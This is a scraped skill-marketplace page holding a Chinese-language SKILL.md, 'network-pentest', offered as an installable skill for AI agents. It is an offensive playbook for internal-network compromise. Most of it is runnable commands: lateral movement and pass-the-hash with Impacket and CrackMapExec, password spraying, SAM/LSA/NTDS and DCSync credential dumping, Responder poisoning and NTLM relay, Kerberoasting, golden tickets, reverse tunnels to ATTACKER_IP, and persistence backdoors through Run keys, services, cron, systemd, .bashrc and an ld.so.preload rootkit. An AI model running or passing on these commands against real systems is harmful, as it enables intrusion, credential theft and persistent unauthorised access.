Manus에서 모든 스킬 실행
원클릭으로
원클릭으로
원클릭으로 Manus에서 모든 스킬 실행
시작하기network-pentest
스타1
포크0
업데이트2026년 6월 9일 18:05
内网渗透 — 横向移动、代理隧道、权限维持、域渗透
설치
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SKILL.md
readonly메뉴
内网渗透 — 横向移动、代理隧道、权限维持、域渗透
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Delegate coding to OpenAI Codex CLI (features, PRs).
Configure, extend, or contribute to Hermes Agent.
Manage multiple remote servers from Hermes via SSH — deploy services, configure firewalls, transfer files, run commands across servers
Clone/create/fork repos; manage remotes, releases.
Parallel data collection from web sources, APIs, and documentation sites
Deploy static sites to GitHub Pages via API — create repo, push, enable Pages, all from CLI
| name | network-pentest |
| description | 内网渗透 — 横向移动、代理隧道、权限维持、域渗透 |
| version | 1.0.0 |
| author | Hermes Agent |
| license | MIT |
| metadata | {"hermes":{"tags":["network","lateral-movement","proxy","tunneling","active-directory","pivoting","persistence"]}} |
| 工具 | 用途 |
|---|---|
| CrackMapExec (CME) | 内网瑞士军刀,SMB/WinRM/LDAP批量操作 |
| Evil-WinRM | WinRM远程Shell |
| Chisel | 隧道/端口转发 |
| ligolo-ng | 反向代理隧道 |
| ProxyChains | 流量代理转发 |
| sshuttle | SSH VPN隧道 |
| Responder | LLMNR/NBT-NS/MDNS投毒 |
| ntlmrelayx | NTLM中继 |
| BloodHound | AD域路径分析 |
| Impacket | Windows协议工具集 |
| Rubeus | Kerberos攻击 |
| Mimikatz | 凭据提取 |
| pypykatz | Python版Mimikatz |
| Certipy | AD CS证书攻击 |
| PowerView | AD枚举 |
| PsExec | 远程命令执行 |
pip install impacket
# SMB共享
smbclient.py user:pass@192.168.1.100
smbclient.py user:pass@192.168.1.100 -shares
# PsExec远程执行
psexec.py user:pass@192.168.1.100
psexec.py domain/user:pass@192.168.1.100
# WMI执行
wmiexec.py user:pass@192.168.1.100
# SMBExec(无文件落地)
smbexec.py user:pass@192.168.1.100
# AtExec(计划任务)
atexec.py user:pass@192.168.1.100 "whoami"
# DCSync导出域hash
secretsdump.py domain/user:pass@192.168.1.100
secretsdump.py -just-dc domain/user:pass@192.168.1.100
# Kerberos票据操作
getTGT.py domain/user:pass
getST.py -spn cifs/target.domain.com domain/user -impersonate administrator
# NTLM hash传递
psexec.py -hashes :NTHASH domain/user@192.168.1.100
wmiexec.py -hashes :NTHASH domain/user@192.168.1.100
# SMB服务器
smbserver.py share /tmp/share -smb2support
# LDAP查询
ldapdomaindump.py -u domain\\user -p pass ldap://192.168.1.100
pip install crackmapexec
# 或
pipx install crackmapexec
# SMB扫描
cme smb 192.168.1.0/24
cme smb 192.168.1.0/24 -u user -p pass
cme smb 192.168.1.0/24 -u user -H :NTHASH # hash传递
# 枚举
cme smb 192.168.1.0/24 -u user -p pass --shares
cme smb 192.168.1.0/24 -u user -p pass --users
cme smb 192.168.1.0/24 -u user -p pass --groups
cme smb 192.168.1.0/24 -u user -p pass --pass-pol
cme smb 192.168.1.0/24 -u user -p pass --sessions
cme smb 192.168.1.0/24 -u user -p pass --loggedon-users
# 密码喷洒
cme smb 192.168.1.0/24 -u users.txt -p 'Password123!'
cme smb 192.168.1.0/24 -u user -p passwords.txt
# 执行命令
cme smb 192.168.1.100 -u user -p pass -x "whoami"
cme smb 192.168.1.100 -u user -p pass -X "Get-DomainUser" # PowerShell
# 凭据收集
cme smb 192.168.1.100 -u user -p pass --sam
cme smb 192.168.1.100 -u user -p pass --lsa
cme smb 192.168.1.100 -u user -p pass --ntds
# WinRM
cme winrm 192.168.1.100 -u user -p pass -x "whoami"
# LDAP
cme ldap 192.168.1.100 -u user -p pass --users
cme ldap 192.168.1.100 -u user -p pass --asreproast
cme ldap 192.168.1.100 -u user -p pass --kerberoasting
# MSSQL
cme mssql 192.168.1.100 -u user -p pass -q "SELECT @@version"
gem install evil-winrm
# 基本连接
evil-winrm -i 192.168.1.100 -u user -p pass
# Hash传递
evil-winrm -i 192.168.1.100 -u user -H NTHASH
# 加载脚本/工具
evil-winrm -i 192.168.1.100 -u user -p pass -s /path/to/scripts/ -e /path/to/exes/
# 上传/下载
upload local_file.txt C:\\temp\\
download C:\\temp\\file.txt ./
# 在shell中
*Evil-WinRM* PS> Invoke-BloodHound -CollectionMethod All
*Evil-WinRM* PS> Invoke-Mimikatz
*Evil-WinRM* PS> menu # 查看内置命令
# 服务端(攻击机)
chisel server --reverse --port 8080
# 客户端(目标机)
chisel client ATTACKER_IP:8080 R:1080:127.0.0.1:1080
chisel client ATTACKER_IP:8080 R:socks
# 本地端口转发
chisel server --port 8080
chisel client ATTACKER_IP:8080 9090:192.168.1.100:3389
# 服务端(攻击机)
./proxy -selfcert
# 客户端(目标机)
./agent -connect ATTACKER_IP:11601 -ignore-cert
# 在ligolo中
>> session
>> ifconfig
>> start --tun ligolo0
# 添加路由
sudo ip route add 192.168.1.0/24 dev ligolo0
sudo apt install proxychains4
# 配置 /etc/proxychains4.conf
# [ProxyList]
# socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 192.168.1.100
proxychains ssh user@192.168.1.100
proxychains curl http://192.168.1.100
pip install sshuttle
# 通过SSH创建VPN
sshuttle -r user@jumphost 192.168.1.0/24
sshuttle -r user@jumphost 192.168.1.0/24 10.0.0.0/24
# 本地转发
ssh -L 8080:192.168.1.100:80 user@jumphost
# 远程转发
ssh -R 8080:localhost:80 user@attacker
# 动态转发(SOCKS)
ssh -D 1080 user@jumphost
# 后台运行
ssh -fN -D 1080 user@jumphost
sudo apt install responder
# 监听并捕获hash
sudo responder -I eth0 -wrf
# 捕获到的hash保存在 /usr/share/responder/logs/
# 用hashcat破解
hashcat -m 5600 captured_hash.txt wordlist.txt
# 中继到SMB
ntlmrelayx.py -t 192.168.1.100 -smb2support
# 中继到LDAP(域控)
ntlmrelayx.py -t ldap://192.168.1.1 --escalate-user attacker
# 中继到HTTP
ntlmrelayx.py -t http://192.168.1.100
# 配合Responder
# Responder.conf: SMB=Off, HTTP=Off
# 然后运行ntlmrelayx
# 安装SharpHound(Windows端)
# 或用Python版
pip install bloodhound
bloodhound-python -u user -p pass -d domain.com -dc dc.domain.com -c All
# 导入Neo4j
# 启动 neo4j
# 打开BloodHound GUI导入数据
# AS-REP Roasting(无需密码)
GetNPUsers.py domain.com/ -usersfile users.txt -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt
# Kerberoasting
GetUserSPNs.py domain.com/user:pass -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt wordlist.txt
# Silver Ticket
ticketer.py -nthash NTHASH -domain-sid S-1-5-21-... -domain domain.com -spn cifs/target user
# Golden Ticket
ticketer.py -nthash krbtgt_NTHASH -domain-sid S-1-5-21-... -domain domain.com administrator
# Unconstrained Delegation
# 用Rubeus监控
Rubeus.exe monitor /interval:5
# Certipy
certipy find -u user@domain.com -p pass -dc-ip 192.168.1.1
certipy req -u user@domain.com -p pass -ca CA_NAME -template VulnerableTemplate
certipy auth -pfx administrator.pfx
# 注册表
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v backdoor /d "C:\\temp\\shell.exe"
# 计划任务
schtasks /create /tn "Update" /tr "C:\\temp\\shell.exe" /sc onlogon
# 服务
sc create backdoor binpath= "C:\\temp\\shell.exe" start= auto
# 启动项
copy shell.exe "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# WMI事件订阅
# PowerShell
$filter = Set-WmiInstance -Namespace "root\\subscription" -Class __EventFilter -Arguments @{Name="backdoor"; EventNamespace="root\\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
# Crontab
(crontab -l; echo "*/5 * * * * /tmp/.backdoor") | crontab
# SSH密钥
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
# Systemd服务
cat > /etc/systemd/system/backdoor.service << 'EOF'
[Unit]
Description=System Update
[Service]
ExecStart=/tmp/.backdoor
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor
# .bashrc
echo "/tmp/.backdoor &" >> ~/.bashrc
# LD_PRELOAD
echo "/tmp/.rootkit.so" > /etc/ld.so.preload
1. 信息收集
├── CME枚举域内主机/用户/组
├── BloodHound分析域路径
└── Responder捕获hash
2. 凭据获取
├── Mimikatz/pypykatz提取密码
├── SAM/NTDS.dit导出hash
├── Kerberoasting/AS-REP Roasting
└── AD CS证书攻击
3. 横向移动
├── Pass-the-Hash (CME/Impacket)
├── Pass-the-Ticket (Rubeus)
├── Over-Pass-the-Hash
├── NTLM Relay
└── WinRM/PSExec/WMI
4. 权限维持
├── 注册表/计划任务/服务
├── SSH密钥
├── Golden/Silver Ticket
└── DCSync + krbtgt hash